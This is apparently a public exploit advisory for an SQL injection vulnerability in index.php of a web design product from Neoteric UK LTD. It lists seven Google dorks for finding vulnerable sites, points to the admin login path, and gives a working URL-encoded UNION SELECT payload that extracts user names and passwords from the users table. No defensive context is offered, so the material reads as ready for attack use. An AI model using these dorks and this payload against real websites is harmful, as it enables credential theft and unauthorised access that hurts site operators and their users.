Web Design Search Engineering Neoteric UK LTD suffers from a SQL injection vulnerability in index.php.
4c0321b255740afc5517f3da03717acea6f427eacf53531810b783509c036af2
#########################################################################
#
# web design search engineering Neoteric UK LTD
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
#########################################################################
#
# DORK 1 : "web design search engineering Neoteric UK LTD"
#
# DORK 2 allinurl: "index.php?option=categories"
#
# DORK 3 : allinurl: "index.php?option=categories category_id"
#
# DORK 4 : allinurl: "index.php?option=search searchType=advanced"
#
# DORK 5 : allinurl: "index php option static page_id"
#
# DORK 6 : allinurl: "index php option cart"
#
# DORK 7 : allinurl: "index.php?product_id="option
#
########################################################################
#
# admin login page=admin/index.php
#
# admin login= www.xxxxxxx.com/admin/index.php
#
#########################################################################
EXPLOIT :
index.php?option=categories&category_id=index.php?option=categories&category_id=-99999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cconcat(name,0x3a,pwd)%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers
#########################################################################
# S@BUN i AM NOT HACKER S@BUN
#########################################################################